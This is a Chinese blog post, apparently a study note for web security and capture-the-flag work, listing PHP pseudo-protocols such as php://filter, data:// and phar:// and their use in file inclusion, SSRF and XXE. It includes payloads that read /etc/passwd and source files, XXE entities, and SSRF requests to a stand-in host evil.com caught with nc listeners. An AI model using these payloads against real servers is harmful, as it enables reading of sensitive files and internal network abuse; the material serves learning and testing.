伪协议的使用方法(SSRF,XXE,文件包含)

最新推荐文章于 2024-07-26 15:01:45 发布
最新推荐文章于 2024-07-26 15:01:45 发布
阅读量1.9k 收藏 7
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qz362228/article/details/125153220
版权

文章目录

一、各伪协议使用方法

在这里插入图片描述

  1. php://协议——访问各个输入输出流(I/O streams)
  2. php://filter——用于读取源码,输出base64加密后的信息
?file=php://filter/convert.base64-encode/resource=xx.php
或
?file=php://filter/read=convert.base64-encode/resource=xx.php
  1. php://input——读取POST数据,用于执行php代码
  2. file://伪协议——读取文件内容
  3. phar://——读取压缩包文件内容
?file=phar://压缩包名/内部文件名
例:phar://x.zip/x.php
  1. zip://——读取压缩包文件内容
?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名]   
例: zip://D:\phpstudy\WWW\x.zip%23shell.php       #->%23
  1. . data://——以get方式提交数据,执行php代码。
?file=data://text/plain,<?php%20phpinfo()?>

二、文件包含 ,XXE,XSSRF利用伪协议的异同

SSRF ssrf利用伪协议

类型:

  1. file:/// — 从文件系统中获取文件
http://example.com/ssrf.php?url=file:///etc/passwd
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini

若该服务器阻止对外部站点发送http请求,或设了白名单,则用以下协议绕过

  1. dict:// — 引用允许通过DICT协议使用的定义或单词列表
http://example.com/ssrf.php?dict://evil.com:1337/ 
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*] 
accepted (family 2, sport 31126)CLIENT libcurl 7.40.0
  1. sftp://
    Sftp代表SSH文件传输协议(SSH File Transfer Protocol),或安全文件传输协议(Secure File Transfer Protocol),这是一种与SSH打包在一起的单独协议,它运行在安全连接上,并以类似的方式进行工作。
http://example.com/ssrf.php?url=sftp://evil.com:1337/ 
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*] 
accepted (family 2, sport 37146)SSH-2.0-libssh2_1.4.2
  1. ldap://或ldaps://或ldapi://
    ladp代表轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议。
http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit
  1. gopher://
    Gopher是一种分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。
http://example.com/ssrf.php?url=http://attacker.com/gopher.php

<?php  header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');?>

evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port1337)Connection from [192.168.0.12] port 1337[tcp/*] accepted (family 2, sport 49398)Hissrftest
  1. tftp://
    TFTP(Trivial File Transfer Protocol,简单文件传输协议)是一种简单的基于lockstep机制的文件传输协议,它允许客户端从远程主机获取文件或将文件上传至远程主机
http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET 
evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port1337)TESTUDPPACKEToctettsize0blksize512timeout3

XXE

  1. php://filter -- 读取文件内容
<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
]>
<user>
<username>&test;</username>
<password>123</password>
</user>
  1. file:// -- 读取用户端文件
<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY content SYSTEM "file:///etc/passwd">
]>
<note>
<name>&content;</name>
</note>

文件包含

  1. php://filter – 读取文件
  2. file://绝对路径 — 读取文件内容
  3. php://input — 读取post数据
  4. phar://压缩包名/内部文件名 – 配合文件上传,可把图片马压缩为一个压缩包后上传再查看
  5. zip:// 压缩文件绝对路径 %23 压缩文件内的子文件名 — # == %23
  6. data://text/plain,<?php ?> – get方式提交数据
乔治777
关注
文件包含漏洞(原理、挖掘与利用、DVWA 文件包含部分)
m0_61506558的博客
08-06 681
在bilibili里面底部的代码是不变的。包含内容包含页头、页脚包含函数 公共函数减少重复代码、便于维护1.2 问题可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞1.3 分类1.3.1 本地文件包含漏洞LFI目录遍历漏洞任意文件访问漏洞固定包含通过接口动态包含包含恶意代码或图片马包含敏感文件1.3.2 远程文件包含漏洞漏洞描述原因后果XXEXML外部实体注入使用XML参数数据,并且可以解析外部实体导致访问敏感文件、探测端口、执行系统命名SSRF。......
Java代码审计之XXE漏洞详解
悦分享
01-24 106
除此之外,XML文档中还规定了一系列定义好的“字符引用”,使用特殊的字母组合来表示某些特殊字符,如“
SSRF中的URL的伪协议
m0_55754984的博客
09-10 2105
当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议 0x01 类型 file:/// dict:// sftp:// ldap:// tftp:// gopher:// file:// 这种URL Schema可以尝试从文件系统中获取文件: http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini 如果该服务器
伪协议的用法说明
Makta
03-03 1324
1、<a> 标签的href属性用于指定超链接目标URL,href属性的值可以是任何有效文档的相对或绝对URL,包括片段标识符和js代码段。 2、javascript: 是一个伪协议,其他的伪协议还有mail: tel: file: 等。 <a id='pswEdit' href='javascript:;'>修改密码</a> javascript:表示:触发&...
SSRF中伪协议学习
csjjjd的博客
07-24 1049
2.dict伪协议 dict 协议最初是为 UNIX 和类 UNIX 系统设计的,用于从远程服务器上查询词典或字典内容。 在互联网上存在一些公共的 dict 服务器,允许用户通过 dict 协议查询广泛的词典资源。
SSRF伪协议
最新发布
Lhy1963245411的博客
07-26 959
学习自从文件系统中获取文件内容,如file:///etc/passwd可用于端口扫描SSH文件传输协议或安全文件传输协议轻量级目录访问协议简单文件传输协议分布式文档传输协议。
伪协议利用
一只web狗
06-23 1688
PHP伪协议PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。
javascript:"伪协议
冰城潇湘的专栏
05-15 1227
"javascript:"伪协议2007-11-08 14:42今天遇到这样一段//jsfunction zw(){     location.href = "02.html";}//htmljavascript : zw()"; name="btn" />这里javascript : zw()是,javascript的伪协议伪协议:是人们对非标准化通信机制
简析xxe的攻击方式
05-09
- 另一种绕过的方案是使用PHP伪协议 `php://filter`,该协议可以读取文件内容并对其进行base64编码,从而避免特殊字符带来的解析问题。 #### 二、URL请求 (SSRF) **服务器侧请求伪造** (SSRF) 是一种XXE攻击的...
深入理解XXE漏洞:攻击策略与防范
"这篇文档主要介绍了XXE(XML External Entity,XML外部实体)攻击的常见手法,包括远程文件读取SSRF(Server-Side Request Forgery,服务器端请求伪造)、参数实体的利用以及DoS(Denial of Service,拒绝服务)...
[红日安全]Web安全Day8 - XXE实战攻防
hongrisec的博客
03-03 1000
本文由红日安全成员: ruanruan 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pyt...
SSRF之文件包含
devil8123665的博客
12-29 442
SSRF之文件包含 https://www.cnblogs.com/lyxsalyd/p/12594797.html
PHP之伪协议
errorr0
03-13 6687
php伪协议安全入门新手值得一看
PHP-伪协议
摘星怪sec的blog
04-25 4363
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
php伪协议
weixin_46601529的博客
12-14 981
什么是php伪协议? PHP伪协议事实上就是支持的协议与封装协议,主要包括以下当然还有其他。 a. file:// — 访问本地文件系统 b. http:// — 访问 HTTP(s) 网址 c. ftp:// — 访问 FTP(s) URLs d. php:// — 访问各个输入/输出流(I/O streams) e. zlib:// — 压缩流 2.当源程序有可控的文件包含函数时,我们就可以利用这些协议,常见的文件包含函数: 1、include 2、require 3、include_once 4、.
web安全——伪协议
热门推荐
永远相信美好的事情即将发生
02-06 1万+
伪协议常常用于文件包含漏洞之中。在php中能够造成文件包含的函数有include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile 函数 1.include函数 可以放在PHP脚本的任意位置,一般放在流程控制的处理部分中。当PHP脚本执行到include指定引入的文件时,才将它包含并尝试执行。这种方式可以把程序执行时的流程进行简单化。当第二次遇到相同文件时,PH
PHP伪协议
weixin_40950781的博客
09-11 985
PHP伪协议0x00 PHP伪协议0x01 PHP伪协议事实上就是支持的协议与封装协议(12种)0x02 是否需要截断0x03 php://php://inputphp://stdinphp://stdoutphp://stderrphp://outputfile://php://filterphp://fdphp://memory 和 php://temp0x04 zip:// 、 bzip2:...
ssrf伪协议 ftp
09-14
SSRF(Server-Side Request Forgery)是一种攻击技术,攻击者通过构造恶意请求,使服务器发起对指定目标的请求,并将响应返回给攻击者。在这种攻击中,攻击者通常会利用伪协议来进行攻击,其中包括ftp协议。 对于SSRF伪协议ftp,攻击者可以构造一个恶意请求,使服务器去请求一个ftp地址,并将响应返回给攻击者。这样,攻击者就可以获得ftp服务器上的敏感信息,或者执行某些恶意操作。 举个例子,假设有一个应用程序接受用户输入的URL,并使用curl函数去请求该URL。攻击者可以构造一个恶意URL,其中包含一个ftp地址,然后将该URL提交给应用程序。当应用程序使用curl函数去请求该URL时,它实际上会去请求ftp服务器上的内容并将响应返回给攻击者。 为了防止SSRF攻击,应用程序开发者需要在编码过程中注意对用户输入进行验证和过滤,确保用户输入的URL只能请求合法和可信的地址,避免访问敏感信息或恶意操作。此外,还可以使用白名单或黑名单的方式限制请求的目标地址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值